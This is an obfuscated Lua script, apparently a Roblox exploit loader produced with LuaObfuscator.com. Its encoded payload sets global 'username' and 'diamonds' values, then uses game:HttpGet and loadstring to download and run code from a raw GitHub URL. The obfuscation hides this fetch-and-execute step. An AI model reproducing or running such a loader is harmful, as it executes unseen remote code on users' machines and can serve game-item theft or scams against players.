--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v66=0;while true do if (v66==0) then v19=v0(v3(v30,1,1));return "";end end else local v67=v2(v0(v30,16));if v19 then local v73=v5(v67,v19);v19=nil;return v73;else return v67;end end end);local function v20(v31,v32,v33)if v33 then local v68=(v31/((5 -3)^(v32-(2 -1))))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(1 + 0))) + 1)) ;return v68-(v68%((1497 -(282 + 595)) -((2192 -(1523 + 114)) + 64))) ;else local v69=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v69 + v69))>=v69) and 1) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (364 -108)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 978 + 19)) );v18=v18 + 4 ;return (v40 * (16778486 -(226 + 1044))) + (v39 * (285370 -219834)) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,958 -(892 + 65) ,47 -27 ) * ((3 -(1188 -(1069 + 118)))^(58 -26))) + v41 ;local v45=v20(v42,371 -(87 + 263) ,211 -(67 + 113) );local v46=((v20(v42,72 -40 )==(1 + 0)) and  -((3 -1) -1)) or (1 + 0) ;if (v45==((0 + 0) -0)) then if (v44==(952 -(802 + 150))) then return v46 * (0 -(0 -0)) ;else v45=1 -0 ;v43=0;end elseif (v45==(1490 + 557)) then return ((v44==(997 -(908 + 7 + (873 -(368 + 423))))) and (v46 * (1/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(596 + (1341 -914)) ) * (v43 + (v44/((2 -0)^52))) ;end local function v25(v47)local v48=18 -(9 + 1 + 8) ;local v49;local v50;while true do if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(442 -(416 + 26))) then return "";end end v48=(775 -(201 + 571)) -2 ;end if (v48==3) then return v6(v50);end if (v48==((1139 -(116 + 1022)) + 1)) then v50={};for v74=(4 -3) -0 , #v49 do v50[v74]=v2(v1(v3(v49,v74,v74)));end v48=441 -(145 + 293) ;end if (v48==(431 -(44 + 386))) then v49=v3(v16,v18,(v18 + v47) -(1487 -(998 + 488)) );v18=v18 + v47 ;v48=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(169 -(9 + 157))) then else v58=nil;while true do if (v52==(0 -0)) then v53={};v54={};v55={};v52=1825 -(1195 + 629) ;end if (v52~=(2 + 0)) then else local v93=0;while true do if (v93==(0 -0)) then for v103=1 + 0 ,v57 do local v104=241 -(187 + 54) ;local v105;local v106;local v107;local v108;local v109;while true do if (v104~=(782 -(162 + 618))) then else v109=nil;while true do if ((0 + 0)==v105) then v106=126 -(116 + 10) ;v107=nil;v105=1 + 0 ;end if (v105~=(2 + 0)) then else while true do if (v106~=(0 -0)) then else local v182=0 -0 ;while true do if (v182==(1 + 0)) then v106=1 -0 ;break;end if ((0 + 0)==v182) then v107=0;v108=nil;v182=1 + 0 ;end end end if (v106==(1 + 0)) then v109=nil;while true do if (v107==(1637 -(1373 + 263))) then if (v108==(1001 -(451 + 549))) then v109=v21()~=(0 + 0) ;elseif (v108==(2 -0)) then v109=v24();elseif (v108==(4 -1)) then v109=v25();end v58[v103]=v109;break;end if (v107==0) then local v189=0;while true do if (v189~=1) then else v107=1552 -(1126 + 425) ;break;end if (v189==(1384 -(746 + 638))) then local v192=405 -(118 + 287) ;local v193;while true do if (v192~=0) then else v193=0 + 0 ;while true do if (v193~=(0 -0)) then else local v201=341 -(218 + 123) ;while true do if (v201==(1582 -(1535 + 46))) then v193=1;break;end if ((1121 -(118 + 1003))~=v201) then else v108=v21();v109=nil;v201=1 + 0 ;end end end if ((2 -1)~=v193) then else v189=1;break;end end break;end end end end end end break;end end break;end if ((1 + 0)==v105) then local v160=0;while true do if (v160==1) then v105=562 -(306 + 254) ;break;end if (v160==0) then v108=nil;v109=nil;v160=1 + 0 ;end end end end break;end if (0~=v104) then else v105=0 -0 ;v106=nil;v104=1;end if ((1468 -(899 + 568))==v104) then v107=nil;v108=nil;v104=2 + 0 ;end end end v56[7 -4 ]=v21();v93=604 -(268 + 335) ;end if (v93==(1 -0)) then for v110=1,v23() do local v111=290 -(60 + 230) ;local v112;local v113;local v114;while true do if (v111==(573 -(426 + 146))) then v114=nil;while true do if (v112==(0 + 0)) then v113=1456 -(282 + 1174) ;v114=nil;v112=1 + 0 ;end if (v112~=(812 -(569 + 242))) then else while true do if (v113==0) then v114=v21();if (v20(v114,2 -1 ,2 -1 )==(0 + 0)) then local v183=0 -0 ;local v184;local v185;local v186;local v187;while true do if ((1025 -(706 + 318))~=v183) then else local v190=1251 -(721 + 530) ;while true do if (v190==(1271 -(945 + 326))) then v186=nil;v187=nil;v190=2 -1 ;end if (v190==(754 -(239 + 514))) then v183=1 + 1 ;break;end end end if (2==v183) then while true do if (v184~=(1332 -(797 + 532))) then else if (v20(v186,3,3)==(1 + 0)) then v187[4]=v58[v187[704 -(271 + 429) ]];end v53[v110]=v187;break;end if (v184~=1) then else local v195=0 -0 ;local v196;while true do if ((0 + 0)==v195) then v196=1500 -(1408 + 92) ;while true do if (v196~=(1130 -(369 + 761))) then else v187={v22(),v22(),nil,nil};if (v185==(238 -(64 + 174))) then local v202=0 + 0 ;local v203;while true do if (v202==0) then v203=0 + 0 ;while true do if (v203~=(1171 -(418 + 753))) then else v187[219 -(42 + 174) ]=v22();v187[2 + 2 ]=v22();break;end end break;end end elseif (v185==(1 + 0)) then v187[3]=v23();elseif (v185==(1 + 1)) then v187[1507 -(363 + 1141) ]=v23() -((1582 -(1183 + 397))^(48 -32)) ;elseif (v185==3) then local v212=0 + 0 ;local v213;local v214;while true do if (v212==(0 + 0)) then v213=1975 -(1913 + 62) ;v214=nil;v212=530 -(406 + 123) ;end if (v212==(1770 -(1749 + 20))) then while true do if (v213==(0 + 0)) then v214=1933 -(565 + 1368) ;while true do if (v214~=(1322 -(1249 + 73))) then else v187[3]=v23() -((1 + 1)^(1161 -(466 + 679))) ;v187[9 -5 ]=v22();break;end end break;end end break;end end end v196=1;end if (v196~=1) then else v184=5 -3 ;break;end end break;end end end if (0==v184) then v185=v20(v114,2,3);v186=v20(v114,4,1906 -(106 + 1794) );v184=1 -0 ;end if ((1 + 1)==v184) then local v197=0 + 0 ;while true do if (v197==(1 + 0)) then v184=8 -5 ;break;end if (v197~=0) then else local v200=0 -0 ;while true do if (v200~=(2 -1)) then else v197=115 -(4 + 110) ;break;end if (v200~=0) then else if (v20(v186,585 -(57 + 527) ,1)==(1428 -(41 + 1386))) then v187[105 -(17 + 86) ]=v58[v187[2 + 0 ]];end if (v20(v186,3 -1 ,5 -3 )==(167 -(122 + 44))) then v187[3]=v58[v187[5 -2 ]];end v200=1;end end end end end end break;end if (v183==(0 -0)) then local v191=0;while true do if ((0 + 0)==v191) then v184=0 + 0 ;v185=nil;v191=1;end if ((1126 -(936 + 189))==v191) then v183=1 + 0 ;break;end end end end end break;end end break;end end break;end if (v111==0) then v112=0 -0 ;v113=nil;v111=1;end end end v52=1616 -(1565 + 48) ;break;end end end if (3~=v52) then else local v94=65 -(30 + 35) ;while true do if (v94==(0 + 0)) then local v102=0 + 0 ;while true do if (v102==(1138 -(782 + 356))) then for v119=268 -(176 + 91) ,v23() do v54[v119-(1258 -(1043 + 214)) ]=v28();end return v56;end end end end end if (1~=v52) then else local v95=0 -0 ;local v96;while true do if (v95~=0) then else v96=1092 -(975 + 117) ;while true do if (v96~=1) then else v58={};v52=7 -5 ;break;end if (v96==0) then local v118=0 + 0 ;while true do if (v118~=(3 -2)) then else v96=1;break;end if (v118~=(1212 -(323 + 889))) then else v56={v53,v54,nil,v55};v57=v23();v118=2 -1 ;end end end end break;end end end end break;end if (v51~=(322 -(53 + 267))) then else v56=nil;v57=nil;v51=1 + 2 ;end if (v51~=(413 -(15 + 398))) then else v52=0 -0 ;v53=nil;v51=983 -(18 + 964) ;end if (v51==1) then v54=nil;v55=nil;v51=2;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v76=v63;local v77=v64;local v78=v65;local v79=v27;local v80=1;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v90=0,v84 do if (v90>=v78) then v82[v90-v78 ]=v83[v90 + 1 ];else v86[v90]=v83[v90 + 1 ];end end local v87=(v84-v78) + 1 ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if (v89<=5) then if (v89<=2) then if (v89<=0) then local v115=v88[2];v86[v115]=v86[v115](v13(v86,v115 + 1 ,v81));elseif (v89==1) then local v121=v88[2];local v122=v86[v88[3]];v86[v121 + 1 ]=v122;v86[v121]=v122[v88[4]];else local v126=0;local v127;local v128;local v129;local v130;local v131;while true do if (1==v126) then v88=v76[v80];v131=v88[2];v130=v86[v88[3]];v86[v131 + 1 ]=v130;v86[v131]=v130[v88[4]];v80=v80 + 1 ;v126=2;end if (2==v126) then v88=v76[v80];v86[v88[2]]=v88[3];v80=v80 + 1 ;v88=v76[v80];v131=v88[2];v128,v129=v79(v86[v131](v13(v86,v131 + 1 ,v88[3])));v126=3;end if (v126==3) then v81=(v129 + v131) -1 ;v127=0;for v176=v131,v81 do v127=v127 + 1 ;v86[v176]=v128[v127];end v80=v80 + 1 ;v88=v76[v80];v131=v88[2];v126=4;end if (v126==5) then v80=v88[3];break;end if (v126==0) then v127=nil;v128,v129=nil;v130=nil;v131=nil;if ((v88[3]=="_ENV") or (v88[3]=="getfenv")) then v86[v88[2]]=v61;else v86[v88[2]]=v61[v88[3]];end v80=v80 + 1 ;v126=1;end if (v126==4) then v86[v131]=v86[v131](v13(v86,v131 + 1 ,v81));v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]();v80=v80 + 1 ;v88=v76[v80];v126=5;end end end elseif (v89<=3) then v80=v88[3];elseif (v89>4) then local v132=v88[2];v86[v132]=v86[v132]();else local v134=v88[2];local v135,v136=v79(v86[v134](v13(v86,v134 + 1 ,v88[3])));v81=(v136 + v134) -1 ;local v137=0;for v151=v134,v81 do v137=v137 + 1 ;v86[v151]=v135[v137];end end elseif (v89<=8) then if (v89<=6) then if (v86[v88[2]]==v88[4]) then v80=v80 + 1 ;else v80=v88[3];end elseif (v89>7) then local v139;v139=v88[2];v86[v139]=v86[v139]();v80=v80 + 1 ;v88=v76[v80];v86[v88[2]][v88[3]]=v88[4];v80=v80 + 1 ;v88=v76[v80];if ((v88[3]=="_ENV") or (v88[3]=="getfenv")) then v86[v88[2]]=v61;else v86[v88[2]]=v61[v88[3]];end v80=v80 + 1 ;v88=v76[v80];v139=v88[2];v86[v139]=v86[v139]();v80=v80 + 1 ;v88=v76[v80];v86[v88[2]][v88[3]]=v88[4];v80=v80 + 1 ;v88=v76[v80];v86[v88[2]]=v88[3];else do return;end end elseif (v89<=10) then if (v89>9) then v86[v88[2]][v88[3]]=v88[4];else v86[v88[2]]=v88[3];end elseif (v89>11) then v86[v88[2]]();elseif ((v88[3]=="_ENV") or (v88[3]=="getfenv")) then v86[v88[2]]=v61;else v86[v88[2]]=v61[v88[3]];end v80=v80 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F706970697069706970696132332F64617A6F7368646E6177627672627473796875646A696B776173642F6D61696E2F313603073O0067657467656E7603083O006469616D6F6E6473024O0080842E4103083O00757365726E616D65030A3O007175616E68627567656D001E3O0012093O00013O0026063O000B000100020004033O000B000100120B000100033O001202000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001D00010026063O0001000100010004033O00010001001209000100013O00260600010017000100010004033O0017000100120B000200074O000800020001000200302O00020008000900122O000200076O00020001000200302O0002000A000B00122O000100023O0026060001000E000100020004033O000E00010012093O00023O0004033O000100010004033O000E00010004033O000100012O00073O00017O00",v9(),...);
